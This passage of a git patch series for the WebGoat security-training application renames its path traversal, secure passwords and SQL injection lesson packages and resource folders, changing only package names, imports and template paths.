-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_upload.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -63,7 +63,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload_fix.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_upload_fix.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -118,7 +118,7 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_upload_remove_user_input.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_upload_remove_user_input.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -174,7 +174,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_retrieval.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_retrieval.adoc"></div>
     <div class="attack-container">
 
         <div class="container-fluid">
@@ -212,11 +212,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_zip_slip.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_zip_slip_assignment.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <div class="upload-container">
@@ -273,7 +273,7 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:lessons/path_traversal/documentation/PathTraversal_zip_slip_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/pathtraversal/documentation/PathTraversal_zip_slip_solution.adoc"></div>
     </div>
 </div>
 
diff --git a/src/main/resources/lessons/path_traversal/i18n/WebGoatLabels.properties b/src/main/resources/lessons/pathtraversal/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/path_traversal/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/pathtraversal/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/path_traversal/images/account.png b/src/main/resources/lessons/pathtraversal/images/account.png
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/account.png
rename to src/main/resources/lessons/pathtraversal/images/account.png
diff --git a/src/main/resources/lessons/path_traversal/images/cats/1.jpg b/src/main/resources/lessons/pathtraversal/images/cats/1.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/1.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/1.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/10.jpg b/src/main/resources/lessons/pathtraversal/images/cats/10.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/10.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/10.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/2.jpg b/src/main/resources/lessons/pathtraversal/images/cats/2.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/2.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/2.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/3.jpg b/src/main/resources/lessons/pathtraversal/images/cats/3.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/3.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/3.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/4.jpg b/src/main/resources/lessons/pathtraversal/images/cats/4.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/4.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/4.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/5.jpg b/src/main/resources/lessons/pathtraversal/images/cats/5.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/5.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/5.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/6.jpg b/src/main/resources/lessons/pathtraversal/images/cats/6.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/6.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/6.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/7.jpg b/src/main/resources/lessons/pathtraversal/images/cats/7.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/7.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/7.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/8.jpg b/src/main/resources/lessons/pathtraversal/images/cats/8.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/8.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/8.jpg
diff --git a/src/main/resources/lessons/path_traversal/images/cats/9.jpg b/src/main/resources/lessons/pathtraversal/images/cats/9.jpg
similarity index 100%
rename from src/main/resources/lessons/path_traversal/images/cats/9.jpg
rename to src/main/resources/lessons/pathtraversal/images/cats/9.jpg
diff --git a/src/main/resources/lessons/path_traversal/js/path_traversal.js b/src/main/resources/lessons/pathtraversal/js/path_traversal.js
similarity index 100%
rename from src/main/resources/lessons/path_traversal/js/path_traversal.js
rename to src/main/resources/lessons/pathtraversal/js/path_traversal.js
diff --git a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
similarity index 95%
rename from src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java
rename to src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
index b0c8c63d4..bce4228f0 100644
--- a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadFixTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFixTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -6,7 +6,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
+import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
diff --git a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
similarity index 95%
rename from src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java
rename to src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
index 3a4d50613..ae10174d4 100644
--- a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRemoveUserInputTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInputTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -6,7 +6,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
+import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
diff --git a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
rename to src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
index 77629dd5a..dba1586bc 100644
--- a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadRetrievalTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrievalTest.java
@@ -1,11 +1,11 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
+import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.security.core.token.Sha512DigestUtils;
diff --git a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
similarity index 97%
rename from src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java
rename to src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
index d88a675c6..a3932cc83 100644
--- a/src/test/java/org/owasp/webgoat/lessons/path_traversal/ProfileUploadTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.lessons.path_traversal;
+package org.owasp.webgoat.lessons.pathtraversal;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
@@ -6,7 +6,7 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.Mockito;
 import org.owasp.webgoat.container.plugins.LessonTest;
-import org.owasp.webgoat.lessons.path_traversal.PathTraversal;
+import org.owasp.webgoat.lessons.pathtraversal.PathTraversal;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.mock.web.MockMultipartFile;
 import org.springframework.test.context.junit.jupiter.SpringExtension;

From 827a9d3467a5e41656e967060cc1f4fd12ea69ba Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:28:32 +0200
Subject: [PATCH 190/227] Renamed to securepasswords

---
 .../SecurePasswords.java                             |  2 +-
 .../SecurePasswordsAssignment.java                   |  2 +-
 .../documentation/SecurePasswords_1.adoc             |  0
 .../documentation/SecurePasswords_2.adoc             |  0
 .../documentation/SecurePasswords_3.adoc             |  0
 .../documentation/SecurePasswords_4.adoc             |  0
 .../SecurePasswords_assignment_introduction.adoc     |  0
 .../documentation/SecurePasswords_intro.adoc         |  0
 .../html/SecurePasswords.html                        | 12 ++++++------
 .../i18n/WebGoatLabels.properties                    |  0
 .../i18n/WebGoatLabels_nl.properties                 |  0
 .../js/questions_cia.json                            |  0
 12 files changed, 8 insertions(+), 8 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{secure_passwords => securepasswords}/SecurePasswords.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{secure_passwords => securepasswords}/SecurePasswordsAssignment.java (98%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_1.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_2.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_3.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_4.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_assignment_introduction.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/documentation/SecurePasswords_intro.adoc (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/html/SecurePasswords.html (68%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/i18n/WebGoatLabels.properties (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/i18n/WebGoatLabels_nl.properties (100%)
 rename src/main/resources/lessons/{secure_passwords => securepasswords}/js/questions_cia.json (100%)

diff --git a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
similarity index 96%
rename from src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
rename to src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
index 37468b20a..0456c0717 100644
--- a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.secure_passwords;
+package org.owasp.webgoat.lessons.securepasswords;
 
 import org.owasp.webgoat.container.lessons.Category;
 import org.owasp.webgoat.container.lessons.Lesson;
diff --git a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
similarity index 98%
rename from src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
rename to src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
index c8108237f..b026722e3 100644
--- a/src/main/java/org/owasp/webgoat/lessons/secure_passwords/SecurePasswordsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.lessons.secure_passwords;
+package org.owasp.webgoat.lessons.securepasswords;
 
 import com.nulabinc.zxcvbn.Strength;
 import com.nulabinc.zxcvbn.Zxcvbn;
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_1.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_1.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_1.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_1.adoc
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_2.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_2.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_2.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_2.adoc
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_3.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_3.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_3.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_3.adoc
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_4.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_4.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_4.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_4.adoc
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_assignment_introduction.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_assignment_introduction.adoc
diff --git a/src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_intro.adoc b/src/main/resources/lessons/securepasswords/documentation/SecurePasswords_intro.adoc
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/documentation/SecurePasswords_intro.adoc
rename to src/main/resources/lessons/securepasswords/documentation/SecurePasswords_intro.adoc
diff --git a/src/main/resources/lessons/secure_passwords/html/SecurePasswords.html b/src/main/resources/lessons/securepasswords/html/SecurePasswords.html
similarity index 68%
rename from src/main/resources/lessons/secure_passwords/html/SecurePasswords.html
rename to src/main/resources/lessons/securepasswords/html/SecurePasswords.html
index b08b6dce2..a57a21c95 100644
--- a/src/main/resources/lessons/secure_passwords/html/SecurePasswords.html
+++ b/src/main/resources/lessons/securepasswords/html/SecurePasswords.html
@@ -3,19 +3,19 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_1.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_1.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_2.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_2.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_assignment_introduction.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_assignment_introduction.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -39,11 +39,11 @@
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_3.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_3.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lessons/secure_passwords/documentation/SecurePasswords_4.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/securepasswords/documentation/SecurePasswords_4.adoc"></div>
 </div>
 
 <script>
diff --git a/src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels.properties b/src/main/resources/lessons/securepasswords/i18n/WebGoatLabels.properties
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/securepasswords/i18n/WebGoatLabels.properties
diff --git a/src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels_nl.properties b/src/main/resources/lessons/securepasswords/i18n/WebGoatLabels_nl.properties
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/i18n/WebGoatLabels_nl.properties
rename to src/main/resources/lessons/securepasswords/i18n/WebGoatLabels_nl.properties
diff --git a/src/main/resources/lessons/secure_passwords/js/questions_cia.json b/src/main/resources/lessons/securepasswords/js/questions_cia.json
similarity index 100%
rename from src/main/resources/lessons/secure_passwords/js/questions_cia.json
rename to src/main/resources/lessons/securepasswords/js/questions_cia.json

From b93c935d6c4a9f192660a719201e37ce1530fda9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=C3=80ngel=20Oll=C3=A9=20Bl=C3=A1zquez?= <angel@olleb.com>
Date: Sat, 30 Jul 2022 22:36:01 +0200
Subject: [PATCH 191/227] Renamed to sqlinjection

---
 .../advanced/SqlInjectionAdvanced.java        |  2 +-
 .../advanced/SqlInjectionChallenge.java       |  2 +-
 .../advanced/SqlInjectionChallengeLogin.java  |  2 +-
 .../advanced/SqlInjectionLesson6a.java        |  4 +--
 .../advanced/SqlInjectionLesson6b.java        |  2 +-
 .../advanced/SqlInjectionQuiz.java            |  2 +-
 .../introduction/SqlInjection.java            |  2 +-
 .../introduction/SqlInjectionLesson10.java    |  2 +-
 .../introduction/SqlInjectionLesson2.java     |  2 +-
 .../introduction/SqlInjectionLesson3.java     |  2 +-
 .../introduction/SqlInjectionLesson4.java     |  2 +-
 .../introduction/SqlInjectionLesson5.java     |  2 +-
 .../introduction/SqlInjectionLesson5a.java    |  2 +-
 .../introduction/SqlInjectionLesson5b.java    |  2 +-
 .../introduction/SqlInjectionLesson8.java     |  2 +-
 .../introduction/SqlInjectionLesson9.java     |  2 +-
 .../mitigation/Servers.java                   |  2 +-
 .../mitigation/SqlInjectionLesson10a.java     |  2 +-
 .../mitigation/SqlInjectionLesson10b.java     |  2 +-
 .../mitigation/SqlInjectionLesson13.java      |  2 +-
 .../mitigation/SqlInjectionMitigations.java   |  2 +-
 .../mitigation/SqlOnlyInputValidation.java    |  4 +--
 .../SqlOnlyInputValidationOnKeywords.java     |  4 +--
 .../css/assignments.css                       |  0
 .../css/challenge.css                         |  0
 .../css/quiz.css                              |  0
 .../db/migration/V2019_09_26_1__servers.sql   |  0
 .../db/migration/V2019_09_26_2__users.sql     |  0
 .../db/migration/V2019_09_26_3__salaries.sql  |  0
 .../db/migration/V2019_09_26_4__tan.sql       |  0
 .../V2019_09_26_5__challenge_assignment.sql   |  0
 .../V2019_09_26_6__user_system_data.sql       |  0
 .../db/migration/V2019_09_26_7__employees.sql |  0
 .../db/migration/V2021_03_13_8__grant.sql     |  0
 .../SqlInjectionAdvanced_plan.adoc            |  0
 .../documentation/SqlInjection_challenge.adoc |  0
 .../documentation/SqlInjection_content10.adoc |  0
 .../documentation/SqlInjection_content11.adoc |  0
 .../documentation/SqlInjection_content12.adoc |  0
 .../SqlInjection_content12a.adoc              |  0
 .../SqlInjection_content12b.adoc              |  0
 .../documentation/SqlInjection_content13.adoc |  0
 .../documentation/SqlInjection_content14.adoc |  0
 .../documentation/SqlInjection_content6.adoc  |  0
 .../documentation/SqlInjection_content6a.adoc |  0
 .../documentation/SqlInjection_content6c.adoc |  0
 .../documentation/SqlInjection_content7.adoc  |  0
 .../documentation/SqlInjection_content8.adoc  |  0
 .../documentation/SqlInjection_content9.adoc  |  0
 .../SqlInjection_introduction_content1.adoc   |  0
 .../SqlInjection_introduction_content10.adoc  |  0
 .../SqlInjection_introduction_content11.adoc  |  0
 .../SqlInjection_introduction_content12.adoc  |  0
 .../SqlInjection_introduction_content2.adoc   |  0
 .../SqlInjection_introduction_content3.adoc   |  0
 .../SqlInjection_introduction_content4.adoc   |  0
 ...Injection_introduction_content5_after.adoc |  0
 ...njection_introduction_content5_before.adoc |  0
 .../SqlInjection_introduction_content6.adoc   |  0
 .../SqlInjection_introduction_content7.adoc   |  0
 .../SqlInjection_introduction_content8.adoc   |  0
 .../SqlInjection_introduction_content9.adoc   |  0
 .../SqlInjection_introduction_plan.adoc       |  0
 .../SqlInjection_jdbc_completion.adoc         |  0
 .../SqlInjection_jdbc_newcode.adoc            |  0
 .../documentation/SqlInjection_order_by.adoc  |  0
 .../documentation/SqlInjection_quiz.adoc      |  0
 .../html/SqlInjection.html                    | 28 +++++++++----------
 .../html/SqlInjectionAdvanced.html            | 12 ++++----
 .../html/SqlInjectionMitigations.html         | 26 ++++++++---------
 .../i18n/WebGoatLabels.properties             |  0
 .../i18n/WebGoatLabels_de.properties          |  0
 .../i18n/WebGoatLabels_fr.properties          |  0
 .../i18n/WebGoatLabels_ru.properties          |  0
 .../js/assignment10b.js                       |  0
 .../js/assignment13.js                        |  0
 .../js/challenge.js                           |  0
 .../js/questions_sql_injection.json           |  0
 .../SqlLessonTest.java                        |  4 +--
 .../SqlInjectionLesson10Test.java             |  4 +--
 .../introduction/SqlInjectionLesson2Test.java |  4 +--
 .../introduction/SqlInjectionLesson5Test.java |  4 +--
 .../SqlInjectionLesson5aTest.java             |  4 +--
 .../SqlInjectionLesson6aTest.java             |  4 +--
 .../SqlInjectionLesson6bTest.java             |  4 +--
 .../introduction/SqlInjectionLesson8Test.java |  4 +--
 .../introduction/SqlInjectionLesson9Test.java |  4 +--
 .../mitigation/SqlInjectionLesson13Test.java  |  4 +--
 .../SqlOnlyInputValidationOnKeywordsTest.java |  4 +--
 .../SqlOnlyInputValidationTest.java           |  4 +--
 90 files changed, 83 insertions(+), 83 deletions(-)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionAdvanced.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionChallenge.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionChallengeLogin.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionLesson6a.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionLesson6b.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/advanced/SqlInjectionQuiz.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjection.java (95%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson10.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson2.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson3.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson4.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson5.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson5a.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson5b.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson8.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/introduction/SqlInjectionLesson9.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/Servers.java (98%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlInjectionLesson10a.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlInjectionLesson10b.java (99%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlInjectionLesson13.java (97%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlInjectionMitigations.java (96%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlOnlyInputValidation.java (94%)
 rename src/main/java/org/owasp/webgoat/lessons/{sql_injection => sqlinjection}/mitigation/SqlOnlyInputValidationOnKeywords.java (94%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/css/assignments.css (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/css/challenge.css (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/css/quiz.css (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_1__servers.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_2__users.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_3__salaries.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_4__tan.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_5__challenge_assignment.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_6__user_system_data.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2019_09_26_7__employees.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/db/migration/V2021_03_13_8__grant.sql (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjectionAdvanced_plan.adoc (100%)
 rename src/main/resources/lessons/{sql_injection => sqlinjection}/documentation/SqlInjection_challenge.adoc (100%)
